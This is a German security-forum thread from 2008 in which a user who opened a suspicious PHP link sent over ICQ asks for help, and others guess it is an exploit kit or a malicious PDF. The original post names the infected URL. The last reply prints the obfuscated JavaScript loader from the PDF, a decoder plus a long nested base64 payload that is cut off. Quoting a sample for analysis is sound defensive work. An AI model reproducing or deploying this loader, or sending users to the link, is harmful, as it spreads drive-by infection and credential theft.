Infizierte php geöffnet kann einer sich das mal anschauen xD

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von unix, 29. Dezember 2008 .

  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 29. Dezember 2008
    folgendes: ein kollege hat mir nen Link geschickt, mit php zum schluss ich vertrau dem hab drauf geklickt dann kackt langsam der Firefox ab und ich habs gleich kapiert das es ein Angriff ist hab Task Manager ff gekillt, im FF hab ich noch NoScript drinn und Adblock falls des was hilft,

    aber der Firefox lies sich nich gleich abschalten und ich denk mal da sind jetzt einige Daten rübergewandert xD

    Mein Kollege weiß nix davon also ist anscheinend wieder son kack ICQ Virus in Umlauf der sich über ICQ selbst verschickt xD!!!!

    Kennt sich einer damit aus, hab atm kein VM installiert, der sich die Seite und den Quellcode vllt. mal anschauen könnte oder so?

    Ich hoffe ich verstoße nich gegen die Regeln damit wenn ich den Scheiß Link jetzt poste xD

    Spoiler
    DAS IST der verseuchte LINK nichd rauf klicken!!!! ^^
    Code:
    http://vide0portal.com/news/index.php

    Kann mir bitte einer helfen, hab schon mein STEAM PW geändert und weitere findet er mit mspass nich jetzt noch meine gespeicherten PWs in FF.
     

  2. Anzeige
    Dealz: stark reduzierte Angebote finden.
  3. #2 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Das File existiert nicht mehr. Von daher kann dir wohl auch keiner helfen.
     
  4. #3 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Warscheinlich wieder ein Browserexploit oder ein Webattackingkit wie MPACK und co. ^^
    Meist sind es Public exploits also wenn du immer mit aktueller Software (browser,windows) surfst kann dir nich viel passieren. Gibt natürlich auch Ausnahmen. :)

    Noscript kann dich bei solchen Sachen retten und ist ziemlich paraktisch, da diese kits glaube ich alle java verwenden.
     
  5. #4 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    hhmm ja ich weiß NoScript ist ja für JavaScripts, aber die Seite hat ja die Endung php, also müsste da NoScript eig. nutzlos sein oder?
     
  6. #5 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    hä ?
    bei mir geht die seite ganz normal.
    also es laggt kurz dann ist da eine weiße seite.
    ich bezweifel stark, dass die meine passwörter nun haben
     
  7. #6 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Nunja ich bin mir ja auch nich 100% sicher gewesen, nur nen Link von jemandem zu bekommen der dir aber keinen geschickt hat, der dann auch noch laggt, und wo danach über 20 Viren und Trojaner aufm PC gefunden werden, da denk ich schon das der :poop: ist ^^ und hab auch schon öfters gehört von so kack scripts die einem dann die PWs auslesen.

    Und iwie kann ich mein ebay PW net ändern!

    Ich geb mein altes ein, dann 2x des neue klick auf OK, komm wieder in Mein Ebay raus und nix ist passiert und krieg auch keine mail xD
     
  8. #7 29. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    also ich als dachte mir nix böses und klick da drauf (eigentlich bin ich ein sehr erfahrener pc-user, und mit opera kann einem nix passieren) und auf einmal hängt sich mein pc auf..


    in der seite ist ein Adobe-Dokument eingebunden dass sich (wenn mans installiert hat) mit dem Adobe-Plugin direkt öffnet.
    Vor einigen Tagen habe ich gelesen, dass es für Adobe Reader ein paar Exploits gibt mit denen man Code ausführen kann o_O

    uff. shit... kann das einer mal in ner sandbox testen und sagen was passiert?
     
  9. #8 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    Komisch. Ich bekomme immer nur nen 404. Gut ich hab auch kein Adobe Plugin installiert, da ich foxit reader verwende
     
  10. #9 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    ja genau ^^ so wars bei mir auch!

    Es kam unten in der Statusleiste was von pdf, hab dann aber ff abgeschossen.
    Und jetzt nach dem Virenscan etc. hab ich nen neustart gemacht und was war ^^

    FoxitReader konnte nicht beendet werden.

    Da hab ich dann auch nochmal Glück gehabt das ich den installiert hab anstatt vom Acrobat Reader.
     
  11. #10 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    hier mal ne Google Diagnose

    AsAck
     
  12. #11 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    1. versuch in der vmbox

    http://www.abload.de/img/unbenanntuu2h.png

    2. versuch nach installation von flashplayer und quick time player

    Not Found
    The requested was not found on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    Apache
     
  13. #12 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    isn javascript exploit, ich schau mir den mal an ^^

    hier der pdf zufinden:
    Code:
    var Kjk05y="";
    var le3nipQQ9R="";
    function cT5JMLJSBS\( uEuDvngENstn \) {
     var rcgkM = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
     var rK3My5Ahub833, XVuusFDKQgt, UZCfP2zS, eXYfR0mUBd6hX1, rFHrnqWFzJjBw, DUqTH6NV1BBFY, vLy3bF, L7Re7kOIh, CB5fT0 = IAE0PnDZ9BbkRV = 0, fxnehBwPP9 = "", PRn1dPl6vvdsj = [];
     uEuDvngENstn += "";
     do {
     eXYfR0mUBd6hX1 = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
     rFHrnqWFzJjBw = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
     DUqTH6NV1BBFY = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
     vLy3bF = rcgkM.indexOf\(uEuDvngENstn.charAt\(CB5fT0++\)\);
     L7Re7kOIh = eXYfR0mUBd6hX1<<18 | rFHrnqWFzJjBw<<12 | DUqTH6NV1BBFY<<6 | vLy3bF;
     rK3My5Ahub833 = L7Re7kOIh>>16 & 0xff;
     XVuusFDKQgt = L7Re7kOIh>>8 & 0xff;
     UZCfP2zS = L7Re7kOIh & 0xff;
     if \(DUqTH6NV1BBFY == 64\) {
     PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833\);
     } else if \(vLy3bF == 64\) {
     PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833, XVuusFDKQgt\);
     } else {
     PRn1dPl6vvdsj[IAE0PnDZ9BbkRV++] = String.fromCharCode\(rK3My5Ahub833, XVuusFDKQgt, UZCfP2zS\);
     }
     } while \(CB5fT0 < uEuDvngENstn.length\);
     fxnehBwPP9 = PRn1dPl6vvdsj.join\(""\);
     fxnehBwPP9 = Mn5dq4o5D\(fxnehBwPP9\);
     return fxnehBwPP9;
    }
    function Mn5dq4o5D \( rK3My5Ahub833 \) {
     var XVuusFDKQgt = [], UZCfP2zS = eXYfR0mUBd6hX1 = uEuDvngENstn = rFHrnqWFzJjBw = DUqTH6NV1BBFY = 0;
     rK3My5Ahub833 += "";
     while \( UZCfP2zS < rK3My5Ahub833.length \) {
     uEuDvngENstn = rK3My5Ahub833.charCodeAt\(UZCfP2zS\);
     if \(uEuDvngENstn < 128\) {
     XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(uEuDvngENstn\);
     UZCfP2zS++;
     } else if \(\(uEuDvngENstn > 191\) && \(uEuDvngENstn < 224\)\) {
     rFHrnqWFzJjBw = rK3My5Ahub833.charCodeAt\(UZCfP2zS+1\);
     XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(\(\(uEuDvngENstn & 31\) << 6\) | \(rFHrnqWFzJjBw & 63\)\);
     UZCfP2zS += 2;
     } else {
     rFHrnqWFzJjBw = rK3My5Ahub833.charCodeAt\(UZCfP2zS+1\);
     DUqTH6NV1BBFY = rK3My5Ahub833.charCodeAt\(UZCfP2zS+2\);
     XVuusFDKQgt[eXYfR0mUBd6hX1++] = String.fromCharCode\(\(\(uEuDvngENstn & 15\) << 12\) | \(\(rFHrnqWFzJjBw & 63\) << 6\) | \(DUqTH6NV1BBFY & 63\)\);
     UZCfP2zS += 3;
     }
     }
     return XVuusFDKQgt.join\(""\);
    }
    
    Kjk05y= cT5JMLJSBS\("Wm5WdVkzUnBiMjRnY0hveWRHSXlURVEwVkdkd1JqVW9lbWhKTVVsUU0weHNkRWdwZXlCeVpYUjFjbTRnVTNSeWFXNW5XeWRtY205dFEyaGhja052WkdVblhTaDZhRWt4U1ZBelRHeDBTQ2s3ZlNCbWRXNWpkR2x2YmlCc1ZVVjZiMU5SY2s4NFdVTlJjaWhNTjNaRFZTbDdJSFpoY2lCQk9ESXpUSEoyUlVKYU1EMHdMQ0JyYTBsdVRFZFhha2xKYUcxWFBVdzNka05WTG14bGJtZDBhQ3dnVDNvNFVrNUdNVnBtY2oweE1ESTBMQ0JFZVVOMVZGRnFSR3BZV25vc0lHbElUWG8wYzJjc0lGTnVOMFl6TjI5cGVUZFJkMGs5Snljc0lGcHFOV1JUWWtOVFpqMUJPREl6VEhKMlJVSmFNQ3dnYWpKVmJuVkNVMjE2V2pJelBVRTRNak5NY25aRlFsb3dMQ0JNYTJWMlFtRkZXREY1WW1SU1BVRTRNak5NY25aRlFsb3dMQ0JZZEhSTFpIWndVWEF4ZEdKNlBVRnljbUY1S0RZekxEVTBMRFl3TERVMUxETXpMRFF3TERReUxETXNORGdzTXpnc01Dd3dMREFzTUN3d0xEQXNNakFzTlRFc01qUXNNVE1zTVRRc05Td3pPU3d5Tnl3ek55dzNMRFl4TERRMUxESTJMREl5TERRc05Ea3NNelVzTkRjc01URXNNVGdzT1N3MU5pd3hOU3d4TWl3ek5pd3lNU3d6TVN3d0xEQXNNQ3d3TERVNExEQXNOVElzTVRBc01pdzFPU3cxTXl3MU1DdzRMREFzTXpJc01Ua3NNU3cyTERJekxETTBMREk1TERReExESTFMRFl5TERVM0xERTNMRFF6TERRMExETXdMRFEyTERJNExERTJLVHNnWm05eUtHbElUWG8wYzJjOVRXRjBhQzVqWldsc0tHdHJTVzVNUjFkcVNVbG9iVmN2VDNvNFVrNUdNVnBtY2lrN2FVaE5lalJ6Wno1Qk9ESXpUSEoyUlVKYU1EdHBTRTE2TkhObkxTMHBleUJtYjNJb1JIbERkVlJSYWtScVdGcDZQVTFoZEdndWJXbHVLR3RyU1c1TVIxZHFTVWxvYlZjc1QzbzRVazVHTVZwbWNpazdSSGxEZFZSUmFrUnFXRnA2UGtFNE1qTk1jblpGUWxvd08wUjVRM1ZVVVdwRWFsaGFlaTB0TEd0clNXNU1SMWRxU1Vsb2JWY3RMU2w3SUV4clpYWkNZVVZZTVhsaVpGSjhQU2hZZEhSTFpIWndVWEF4ZEdKNlcwdzNka05WTG1Ob1lYSkRiMlJsUVhRb1dtbzFaRk5pUTFObUt5c3BMVFE0WFNrOFBHb3lWVzUxUWxOdGVsb3lNenNnYVdZb2FqSlZiblZDVTIxNldqSXpLWHNnVTI0M1JqTTNiMmw1TjFGM1NTczljSG95ZEdJeVRFUTBWR2R3UmpVb01UazRYa3hyWlhaQ1lVVllNWGxpWkZJbU1qVTFLVHNnVEd0bGRrSmhSVmd4ZVdKa1VqNCtQVGc3SUdveVZXNTFRbE50ZWxveU15MDlNanNnZlNCbGJITmxJSHNnYWpKVmJuVkNVMjE2V2pJelBUWTdJSDBnZlNCOUlHVjJZV3dvVTI0M1JqTTNiMmw1TjFGM1NTazdJSDBnYkZWRmVtOVRVWEpQT0ZsRFVYSW9KMnM1UW5WYWVFSjFRVGR4TmxORVpISkJibDgxWlUxZmNERkVObVJZVm5KMlptMVJNbVZXY25abWJWRXlaVlp5ZG1adFVUSmxWbkoyTVRkVmFVNUVjblpsYlRBeVRrUnlkamczV2pRd1ZuSjJja2RXTkRCV2NuWnlSMUZLTTFaeWRqZGpRa3BsVm5KMk4xTlJNbVZXY25ZM1UyZHBTVVJ5ZGpkZlVVcEJWbkoyYUdOVmFVVkVjblpvWTJkcGFFUnlkbkpxUWpKb1JISjJZMk0xTWpkRWNuWTNZMVZwYUVSeWRqaFNNR2xvUkhKMk4wMHdOR2hFY25Zd04yY3labFp5ZG1acVZtbGxWbkoyTURkbk1tWldjblk0VmxWcFQxWnlkamRqTlVwbFZuSjJOMk5WYVU1RWNuWTRVakJwYUVSeWRrNXlVVXBsVm5KMk9GcFJNRTlXY25ZM2R6QTBNMVp5ZGpGSlVVcGxWbkoyTjJOVlNqTldjblkzWTFWcGFFUnlka2wzWnpJNFZuSjJUbkl3YVU1RWNuWlBTVkV3VDFaeWRqaFdNRW96Vm5KMk1Va3dhVE5XY25ZM1kxVkthRVJ5ZGpkalZXbG9SSEoyU1hkbk1qaFdjblpPY2pCcFQxWnlka1YzTlRCUFZuSjJNMGN3TW1oRWNuWXhTVlpLWTBSeWRqZGpOVXBqUkhKMk4yTlZhV2hFY25aSmQyY3lPRlp5ZGs1eU1HbGxWbkoyTVVkUk1FOVdjbll4TjJkS00xWnlkakZKVVRCb1JISjJOMk5DU2s1RWNuWTNZMVZwYUVSeWRrbDNaekk0Vm5KMlRuSldhV2hFY25aaFZqVXdUMVp5ZGpGYVZUQTRWbkoyTVVrd01rOVdjblkzWTJkS01GWnlkamRqVldsb1JISjJTWGRuTWpoV2NuWkpZMmRwVGtSeWRtTnNWakpvUkhKMk1GcG5Ta1ZFY25ZNE56QktRVlp5ZG1oc01EUkpSSEoyTjE5UlNqaFdjblkzWTFWcE4wUnlkazUzTUdsb1JISjJNRnBuTWpoV2NuWTRVbG8wVGtSeWRqZFRWVFJKUkhKMk4wUTFNRUZXY25ZNFVsWTBPRlp5ZG1oc1ZqUkpSSEoyTVVsV05EQldjblkzWTJjeVpsWnlkamRqVldsb1JISjJja2xXTkdoRWNuWm9SRkZwTUZaeWRqQTNRalF4Vm5KMlQyUlJTazlXY25ZM1kxVnBhRVJ5ZGpnM01HbG9SSEoyYUUwd05FbEVjblpoV21jeVpsWnlkbUUzWnpKRlJISjJPRGRXTkdoRWNuWkZZMVUwU1VSeWRqTkhVVEJQVm5KMk4yTlZhV2hFY25aT1kxVnBhRVJ5ZGtsM1p6Sm1WbkoyY2xaV2FVNUVjblpPWXpCcFkwUnlkazUzWnpKbVZuSjJNVWxXYVU5V2NuWTNZelV3TjBSeWRqZGpWV2xvUkhKMlNYZFZhVVZFY25aaFpGbzBhRVJ5ZGs1Tk1HbG9SSEoyUlhjd01ETldjblpoWkZFd1NVUnlkamRUVlRSb1JISjJjbHBWTUU5V2NuWTNZMVZwYUVSeWRqQmFWVW94Vm5KMk9GSmFOR2hFY25ZM1RUQTBTVVJ5ZGpkRU5UQkJWbkoyT0ZKV05EaFdjblpvYkZZMFNVUnlka2xqTlVwUFZuSjJOMk5WYVdoRWNuWnlWakJwYUVSeWRrNXNNR2x5Vm5KMlNYZFZhVVZFY25aalRVSTBUa1J5ZGs1TlFrcG1WbkoyTTBkV05FVkVjblpGWTFVd1NVUnlkazVOWnpSb1JISjJTWGRuTW1aV2NuWnlWbFpwWlZaeWRrNWpNR2xKUkhKMlRuZG5NbVpXY25ZeFNWWnBUMVp5ZGpkalFqUkZSSEoyTjJOVmFXaEVjblkzWXpVd1FWWnlkakJhVlVveFZuSjJPRkphTkdoRWNuWTNiREEwU1VSeWRqZGlOVEJCVm5KMk9GSldORGhXY25ab2JGWTBTVVJ5ZG1oak5VcFBWbkoyTjJOVmFXaEVjblp5VmpCcGFFUnlkamhTTUVveFZuSjJhR05WTkVsRWNuWTNSRFV3UVZaeWRqaFNWalE0Vm5KMmFHeFdORWxFY25ZM1l6VktUMVp5ZGpkalZXbG9SSEoyU1VSVmFXaEVjblpPWW1jMFpsWnlkakZXVldsRlJISjJNVlpWYVVWRWNuWXhWbFZwUlVSeWRqRldWV2xGUkhKMk1XMVdNa1ZFY25aT1JEQnBUa1J5ZGpoU1ZqUkZSSEoyTVZKQ1NrRldjblpPWWxWS2NsWnlkakUzVlVveFZuSjJPRkpXTkVsRWNuWTRVbEZLWlZaeWRqZHNNREJoVm5KMlRsTldNbVpXY25aT2NqQnBaVlp5ZGpCdFp6Sm1WbkoyT0ZKUmFXVldjblpvZHpBd1RrUnlkamROVlRCUFZuSjJUbkl3U2tWRWNuWXdNRll5WmxaeWRqZE5RalJvUkhKMlkwMVZTa1ZFY25aSlkxWktPRlp5ZG1acU1EUTNSSEoyWVcxVmFVVkVjblpqVFdjME1GWnlkamRNTUVvd1ZuSjJhR05WTWpOV2NuWXpValZwUVZaeWRqZHNNREJPUkhKMllWcFdTamRFY25ZM1RWVnBZVlp5ZGtsalZVcGpSSEoyTTFZMVNtWldjbll6V2xGcFpsWnlkakJhWnpRelZuSjJUa1JSU2tsRWNuWXhVbFl5WmxaeWRrNUVWakptVm5KMk4wMUNORTVFY25aeU1GcEtZVlp5ZGpkTlZqSm1WbkoyT0ZJd05HWldjblpvVFZZMFFWWnlkbVZxTUdsRlJISjJOMU5uTW1aV2NuWTNUV2N5WmxaeWRrNTNWa3BKUkhKMllWSm5OR0ZXY25ZM1kxVnBUMVp5ZGpOcU5VcFBWbkoyTTBjd1NqTldjblpPZDFWS01WWnlka2xOVmpSalJISjJTVXd3TkdGV2NuWTNZMVUwTTFaeWRrOVNWakp5Vm5KMlQwZGFNbVpXY25aaE4wSktTVVJ5ZGs4M1ZrcG9SSEoyT0ZKV01qQldjblpsUjFZeVFWWnlkamczUWpJeFZuSjJUMUphTW1GV2NuWTRiV2N5TTFaeWRqaHRWa28zUkhKMk9GSm5NbWhFY25ZNFZtZEthRVJ5ZGs5SlZqSkJWbkoyWVRkQ01tVldjblk0TjJjeVJVUnlkamhTVmpJelZuSjJUMGRXU2pkRWNuWlBSMVl5Y21weVpFcEhSSFpHVTNWelkySmlTbUUyTmpaNlRFZHVSRTFSTlVCNE1IWTFSRXhMU0hjMlMxQmZSSE5RVm5WS1NVd3dORkJXZFVwSlREQTBXREIzTURoM1lrczVVRjgyWkdwUlNrbzNaSEJoVEVRMU5IaFdOblV4ZDJsVU1WOUdVakZmTW5vNU5saEJibmcyVUc1TU5XWmZUREJQWDE5MU5rUTJaR05pWWtwaE5qWTJla3hIYmtSTlVUVkFibmcyVUc1TU5XWmZObkpwYkY5a1kySmlTbUUyTmpaNlRFZHVSRTFSTlVBeGNuSmpZbUpLWVRZMk5ucE1SMjVFVFZFMVFERldka1pUZFhNMWVHSndZWGhSYVc1VFZrczJObUpZTVRrMVVHVlNZa2cxYldSMldFMTFkbUZ5WWpZMFgzaEtOamRNTlZFelZuWkdVM1Z6WldKa2RUUjRVV2x1VTFaTE5qWmlXREU1TlZCbFVtSklOVzFrZGxoTmRYWmhjbUkyTkY5NFNqWlNOVFZoYW5VMk5tTndTMVJmUWtwdVUxUmZOa1JpTmpSaWRYVjFOMHcxVVROYWRuaHlOalpRWDNkTFpuSk1OVFYxWHpVMWJEWjJlREZFTlRRMlVVcHlZMUZLTVVkUlNsRnRkWFpSYkY5eVpXSmtkVFF4ZDB0bWNrdzFTMUJmTmxoVFJ6QTRkMkpMT1ZwaVMyRjRYM0kxUkV4Mk9WcG5TMkYzWDFGNE1IY3dhVGxpUzNnd1lsRmtSMW93VVdaMWNqTnFVVW94TXpCMU1qRjNaRkV6WkhCaFUyUTJiM0ppVVVkNFdrdG1ja3cxUzBsQ2JrdHljMjVMUkZaWWNHSnpkbVJqWkhCaFRIZDFNVlphYmxSbVZUUjBZMVZZWkdweVNtRXdWbk5MYW5Jd01EQXdNREF3TURBd2FuZGtXREF3TURBd01EQllNMFJ6TURBd01EQnFkMlJZWkZFd2NtUlJNSEprVm5OTGFuZ3djbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJXYzB0cWVEQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISnFkMlJZWkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKcWQyUllaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGRXdjbVJSTUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJZTTBSemNtUlJNSEprVVRCeVpGRXdjbVJSTUhKcWQyUllaRkV3Y21SUk1ISmtVVEJ5WkZFd2NtUlJNSEprVVRCeVpGWnpTMnA0TUhKa1VUQnlaRkV3Y21SUk1ISmtVVEJ5YW5jd1FXSmtkVFp1ZUV0aGNtSTJabU0yWkZoV2VESkJSMUZLTVRkaWN6WXpOa3BCUmtKdVYzZENXR2hFYzJSS04xOTJOVTAyZGxFNVlqWTVOMTlJVkhJd01EYzJYelE0WkhGMmVEQjRjMHBNUkhaR1UzVnpkVEUxZG0xZmRXNVRUVFp6WkVkRU5sQnNkWE5KVTFKTFJuSjFaRkV6VVhOcFJGSTJTR0prZFhCdU5uTTJkMmN5TUdObmNEVmZlSFU0ZUVKMlYyTlVNbmRmUW1rMlIzaElSV05DTkhSeVduQnFSSEV5Y2xKQ1VGRkhkMUU1U1hWMVVUWmZOVGxrZUhVNGVFSjJWMk5VTW5kZlFtazFkVjgxTld3MmRuaG1SRXBmUjNFMGFFMUNXREJ0WDFocWJGRXdZekZWWkVwZlluWlNiRkpRZW1OUlJrUnNOWE5MVVZGemVHTmtiazltWjFnNFpIQlFhekV3ZURsa1luWlNiRkpRZW1OUlJrUnNOWE5rUjNoMU9IaENkbGRqVkRKM1gwSnBOVzFrZGxoTmRYWmhjbUkyTkY5NFNqWkhjVFJvVFVKWU1HMWZXR3BzVVRCak1VSmZZVEIzTURscVpEVm1SRkpMTlV4NGRUaDRRblpYWTFReWQxOUNhVXBIY25nNU4xOTJOVTAyZGxFNVlqWTVaR0pRZDJOSE1tdFRjVXA0TUhoelNreEVka1pUZFhObk5qVkthazFrU0V0c2NITmtSM2hLY2t4YWNERnROa3BJVEZwd1NrZEVka1pUZFhOaE5reElVMFJrTW5KTWN6UkJVbUpZWjJ4MWMyUkhjblkxUkV4TFNIYzJTMUJmUkhOUVZuVXlaVkphU2xCV2RUSmxVbHBLVUZaMU1tVlNXa3BRVm5WS2FFUm5ORkJXUjBwbFZsWTBVRlpTTWpodFZUQlFWblV3TVdwVk1GQldkVEF4UnpCS1VGWmthV2hOV2twUVZtUnBZVkphU2xCV1pHbE9ZMVUwVUZaa2FYSkhNREpRVmxKcGFFUkNORkJXVW1sb1kyZHBVRloxTUU1c1ZtbFFWblZwYUdJd2FWQldaR2xvUkdkcFVGWlNNbVpXWjJsUVZtUnBaVnBuYVZCV1pEQm9ZMUV5VUZaMU1tRTNRa3BRVm1Rd2FHTlJNbEJXVWpJM1JFSXlVRlprYVdoTVdrcFFWbVJwYUVSbk5GQldVakptVm1kcFVGWlNOREJIV2twUVZsSXlNMlJhTWxCV1pHa3pXbFZLVUZaMVNrOUhXa3BRVm1ScGFIY3dTbEJXWkdsb1JHZHBVRlprTkVsalZqSlFWbEkwTUZabk5GQldSekpQWkZveVVGWlNNa0ZhTUVwUVZuVktUMVpWU2xCV1pHbG9kMVpwVUZaa2FXaEVaMmxRVm1RMFNXTldNbEJXVWpRd1ZrSXlVRlpITkVsZldqSlFWbVJLTVZaV2FWQldkVXBQYWxGcFVGWmthV2hNVVdsUVZtUnBhRVJuYVZCV1pEUkpZMVl5VUZaU05EQldRa3BRVm5WS01XUmFNbEJXZFVwb1V6QktVRloxU2s5a1ZtbFFWbVJwYUUxV05GQldaR2xvUkdkcFVGWmtORWxqVmpKUVZsSTBNRGRuYVZCV1VrbzNYMW95VUZaMVNrbHlWakpRVm5WS1QxWmFNbEJXWkdsb1V6QXdVRlprYVdoRVoybFFWbVEwU1dOV01sQldaRFJvWTJjMFVGWjFhVTgzVm1sUVZtUXdTVk5hTkZCV1VqSTRXakF5VUZaU2FVOWFWVFJRVm1ScGNrZFdNbEJXWkdsb1JGVnBVRlpTTkROV1oybFFWbVF3U1dOV01sQldVakptYldjMFVGWmthVTUzVlRSUVZtUnBOMTh3TWxCV1VqSm1hbWN5VUZaU2FVOXFWVFJRVm5WS1QycFZNRkJXWkdsb1kxRXlVRlprYVdoRVoybFFWblV3VDJwbmFWQldVbWxCVWxVd1VGWmtNR2hOTlVwUVZrY3lja2RhTWxCV1pHbG9SR2RwVUZaU01qaFdaMmxRVmxKcFpWcFZORkJXVWtwSlkxRXlVRlpTU21oaldqUlFWbEl5T0dwbmFWQldSelJvZDFVMFVGWmtTakZrV2pKUVZtUnBhRVJuYVZCV1VqUm9SR2RwVUZaa05FbGpVVEpRVm5Vd1FUZG5ORkJXVWpRNFZqVnBVRlpTTkVsalVUSlFWblZLVHpkQ01sQldaR2xvWHpCcFVGWmthV2hFWjJsUVZtUTBTVVJDTkZCV1VrcHliV2RwVUZaU05HVldaMmxRVmtjME16QXdTbEJXVWtweVpEQTBVRlprYVU1M1oybFFWblV3U1hKYU1sQldaR2xvUkdkcFVGWmtNRWwzVVVwUVZsSXlabTFuYVZCV1pHbGxXbFUwVUZaa2FUZGZNREpRVmxJeVptcG5NbEJXVW1sUGFsVTBVRlprTkdoTVdqSlFWbVJwYUVSbmFWQldkVEJCVm1kcFVGWlNORTlXTlRCUVZtUTBTVVJDTkZCV2RXbEZUV2MwVUZaU05FVk5VVEpRVm1SS01XcENORkJXUnpSb2NqQTBVRlpTTkVWVFoybFFWbVEwU1dOUk1sQldkVEJCTjBKS1VGWlNORGhXVlRSUVZsSTBTV05STWxCV2RVcFBOMEl5VUZaa2FXaE5RalJRVm1ScGFFUm5hVkJXWkdsb1h6QXlVRlprTUVsM1VVcFFWbEl5Wm0xbmFWQldaR2xQV2xVMFVGWmthV05mTURKUVZsSXlabXBuTWxCV1VtbFBhbFUwVUZaU2FXaE1XakpRVm1ScGFFUm5hVkJXZFRCQlZtZHBVRlpTTW1aYVVVcFFWbEpwYUhkVk5GQldaR2szWHpBeVVGWlNNbVpxWnpKUVZsSnBUMnBWTkZCV1pHbG9URm95VUZaa2FXaEVaMmxRVm1RME4wUm5hVkJXVWpSalV6VXlVRloxU2pkRVFqUlFWblZLTjBSQ05GQldkVW8zUkVJMFVGWjFTamRFUWpSUVZuVktaVGRhTkZCV1VqUkJWbWMwVUZaU01tWnFRalJRVm5WS1kwMHdNbEJXVWpSamQxRXdVRloxU21oM1VVcFFWbEl5Wm1wVk5GQldVakptUjFwS1VGWmthVTh3VmtwUVZsSTBZVGRSTWxCV1VqUXdWa0pLVUZaa01FVmpVVEpRVmxJeVpsSkNTbEJXVW1rek1GWTBVRlprYVVWeVdqSlFWbEkwTUZwYU5GQldaREF3TjFFeVVGWmthVVZOWjJsUVZuVnBSWGRhTkZCV1pEUTRhbFl5VUZaMU1tRmFWV2xRVmxKS1JVUkNORkJXZFdsRlUxVXdVRlprYVRGYU1EQlFWbEpwYUVRd1NsQldaRXBqWWxVeVVGWmthVTh3VmpSUVZsSktNMm93YVZCV1pHbEZSR2RLVUZaa05HaDNVV2xRVm1SS04weFJNbEJXWkVvelVqVXlVRlprTUVsVFZVcFFWbEkwUVVjd05GQldkVXBtTjFFeVVGWlNORUUzVVRKUVZtUnBSVTFuTkZCV2RUQXdiVlpLVUZaa2FXVTNVVEpRVmxJeVpsbzFNbEJXVW1sbGFsVXlVRlpIU21GV1FqUlFWbVJwVG1OUk1sQldaR2xGWTFFeVVGWlNORE5xTURSUVZsSktZMU5uU2xCV1pHbG9SRUl5VUZaa1NrNU1XakpRVm1SS01Wb3dTbEJXVWpSSmQxRktVRlprTkdWcU5XbFFWbVEwTVZwblNsQldaR2xvZDFWS1VGWlNNakJ0Vm1sUVZrZEtZMk5STWxCV1J6SmxhbFl5VUZaU01rVnNVVXBRVmtkS1ptMVJhVmd3ZHpBNU4yUndZVXg0Um1aRWNEQlNURlEwUXpsZmJsUk1jbkk1UjFGUlprZFJTakZIVVVwS1IwUjJSbE4xYzNaNFRHNVJiRFpRVUUxU2NFaHlZbEJQVEhKeU9XcDFObGxpYzNaQlpIVklTVVJSTlhwdVFuWTFkVjgxTld3MmRuaE1SR1E1YWxvd09UZGtjR0ZNZUVoRlkwSTBkSEphY0dwRWNUSnlVa0pRT1ZGUmMzZGlaRmh5VVRWSVRqRkNObEk1TlhOMVIzaGtkbmhNYmxGc05sQlFUVkp3U0hKaVVFOHhlRXB5VFZFd1VUTlJjemgzWWtzNVpHSjJVbXhTVUhwalVVWkViRFZ6WkVkeWRqVkVURXRJZHpaTFVGOUVjMUJXWkRBeE1GRktVRlprTURFd1VVcFlNSGN3T1dSaWRsSnNVbEI2WTFGR1JHdzFjMlJIZURaSll6QlJhRk5pTm5oa1luWlNiRkpRZW1OUlJrUnNOVjg1UjNFMGFFMUNXREJ0WDFocWJGRXdZekZWWkVwSFJIWkdVM1Z6Y0hKYU1sTlRkVFpTZUVKTGRreHljamxrUkc1aVREQllaWGR4ZFhSTWNsODVSMUZSWmtkUlNqRkhVVXBSUm5oR1prUndNRkpNVkRSRE9WOXVWREZSYzJrNVlrczVaRVIyUmxOMWN6Wk5SM1pPTVZWUk1YSmlVREJOUWpSTmJHUnlNVE5STm1Wc1VqUkRjblZMVVdaVlVVVk5O